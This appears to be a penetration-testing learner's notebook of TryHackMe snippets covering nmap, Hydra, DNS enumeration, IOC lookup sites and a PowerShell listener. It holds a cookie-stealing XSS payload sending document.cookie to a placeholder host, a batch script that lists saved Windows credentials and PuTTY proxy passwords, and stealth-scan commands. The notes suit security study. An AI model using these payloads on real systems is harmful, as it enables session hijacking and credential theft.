[ransomware] No more ransom

 https://www.nomoreransom.org/

crypto-sheriff: Able to identify the category of Ransomware

decryption-tools: Providing download of Decryption tools

report-a-crime: A collection itemizing links of law enforcement agencies

[Chrome OS] Install Qemu and run Kali on Chrome OS

Start Penguin

Run the following commands

$ sudo apt-get update

$ sudo apt install qemu-kvm libvirt-clients libvirt-daemon-system bridge-utils virtinst libvirt-daemon virt-manager

Go back to Chrome OS's Start button and run "Virtual Machine Manager".

Download Kali qemu version to an USB flash drive before plugging the drive into Chrome OS.

[TryHackMe] Online Cracking website

 https://crackstation.net/

[TryHackMe][Certificate]TryHackMe Junior Penetration Tester Certificate

 

[tryhackme][Windows][unpatched]Check software version to find unpatched software

 #wmic product get name,version,vendor

[tryhackme][Windows][Credential Restoration] Cred_Restoration.bat

 @echo off

echo(

echo Showing significant files...

IF EXIST "C:\Unattend.xml" (

    echo C:\Unattend.xml exists.

)

IF EXIST "C:\Windows\Panther\Unattend.xml" (

    echo C:\Windows\Panther\Unattend.xml exists.

)

IF EXIST "C:\Windows\Panther\Unattend\Unattend.xml" (

    echo C:\Windows\Panther\Unattend\Unattend.xml exists.

)

IF EXIST "C:\Windows\system32\sysprep.inf" (

    echo C:\Windows\system32\sysprep.inf exists.

)

IF EXIST "C:\Windows\system32\sysprep\sysprep.xml" (

    echo C:\Windows\system32\sysprep.inf exists.

)

IF EXIST "%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" (

    echo %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt exists.

)

IF EXIST "C:\inetpub\wwwroot\web.config" (

    echo C:\inetpub\wwwroot\web.config exists.

)

IF EXIST "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config" (

    echo C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config exists.

)

echo(

echo Showing saved credentials on the system...

cmdkey /list

echo(

echo Show Putty Proxy passwords...

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

[tryhackme][nmap]Hidden NMAP Scan

#nmap -e tun0 -f -T1 -D 10.10.174.103,RND,10.10.174.104,RND,ME,RND,RND -Pn 10.10.174.2

Use Fragment, Low Rate and Decoy techniques to scan 10.10.174.2

[hydra][brute force][tryhackme] THC Hydra parameters

 -l username Provide the login name

-P WordList.txt Specify the password list (e.g. /usr/share/wordlists/rockyou.txt) to use

server service Set the server address and service to attack

-s PORT Use in case of non-default service port number

-V or -vV Show the username and password combinations being tried

-d Display debugging output if the verbose output is not helping

[port scan] Windows 10 and above probes the status of a remote port

 # ssh -p PORT IP

[nmap][tryhackme] Nmap output parameters

 -oN save output in normal format

-oG save output in grepable format

-oX save output in XML format

-oA save output in normal, XML and Grepable formats

[nmap][netcat][nc] Use Nmap to run a simple test verifying NIDPS effectiveness

 Attacker Machine:

# nmap -sT -Pn --script all -p 80 VICTIM_IP_ADDRESS

Victim Machine:

# ncat -l -k -t -p 80

Verify the version of jQuery.UI through Firefox

 Use Firefox to browse the URL, open "Web Developer Tools", go to "Console" tab, and run the command "jQuery.ui.version".

[TryHackMe] Email Header Analysis

1. X-Originating-IP - The IP address of the email was sent from (this is known as an X-header)

2. Smtp.mailfrom/header.from - The domain the email was sent from (these headers are within Authentication-Results)

3. Reply-To - Instead of replying the From email address, this is the email address specific to receiving replying emails

Reference: https://web.archive.org/web/20221219232959/https://mediatemple.net/community/products/all/204643950/understanding-an-email-header

[TryHackMe] Fuzzy Hashing

 https://ssdeep-project.github.io/ssdeep/index.html

How to hide Caller ID

 Dial "*67" as a prefix.

[TryHackMe] URL Shortener

 [TryHackMe] URL Shortener

Common URL Shorteners are shown as follows.

bit.ly

goo.gl

ow.ly

s.id

smarturl.it

tiny.pl

tinyurl.com

x.co

Append "+" to the shortened URL to see the original URL.

[TryHackMe] Punycode

 Example:

What you saw in the URL above is adıdas.de which has the Punycode of http://xn--addas-o4a.de/

Tool:

Punycode can be inserted through Microsoft Word.

Punycode translator:

https://www.punycoder.com/

[TryHackMe] IOC Search

 https://metadefender.com/

https://talosintelligence.com/

https://www.virustotal.com/gui/home/upload

https://intelligence.any.run/analysis/lookup

https://bazaar.abuse.ch/browse/

https://malshare.com/search.php

PS: Obtain SHA256 under Windows

#CertUtil -hashfile [FILENAME] SHA256

[TryHackMe] Shellcode/Payload

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://github.com/danielmiessler/SecLists

[TryHackMe] SearchSploit

 Update Searchsploit

# searchsploit -u

Search exploits

# searchsploit KEYWORD

[TryHackMe] MD5 HASH Cracker

 https://crackstation.net/

[TryHackMe] Cookie Hijacking through XSS

 XSS Payload:

</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>

Listening side:

#nc -nvlp PORT_NUMBER

[Powershell] A script to listen a given TCP port

 # Manually execute "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process"

# Name this file as Listen-TCP.ps1

param (
    [int]$Port = 8080  # Default port is 8080, you can specify another port when running the script
)

$gsock = {
	# Create a TCP listener on the specified port
	$listener = [System.Net.Sockets.TcpListener]$Port
	$listener.Start()

	Write-Host "Listening on port $Port..."

	try {
		while ($true) {
			# Accept a client connection
			$client = $listener.AcceptTcpClient()
			Write-Host "Client connected!"

			# Get the network stream for reading data
			$stream = $client.GetStream()

			# Set up a reader to read from the stream
			$reader = New-Object System.IO.StreamReader($stream)

			# Read the data from the stream
			while ($reader.Peek()) {
				$data = $reader.ReadLine()
				Write-Host "Received: $data"
			}

			# Close the client connection
			$reader.Close()
			$client.Close()
		}
	}
	catch {
		Write-Host "Error: $_"
	}
	finally {
		# Stop the listener when done
		$listener.Stop()
		Write-Host "Listener stopped."
		.$gsock
	}
}

&$gsock
# .\Listen-TCP.ps1 -Port 9090

[certificate] ISO/IEC 27001:2022 LA

 

[TryHackMe] DNS Enumeration

 1) CA's Certificate Transparency logs

Use https://crt.sh/ to search the domain.

2) Google Hacking

Utilize the keywords, "site" and "inurl".

3) Employing the tool, dnsrecon

# dnsrecon -t brt -d DOMAIN

4) Employing another tool, sublist3r.py

# sublist3r.py -d DOMAIN

5) Leveraging Virtual Host through the tool, ffuf

# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u http://IP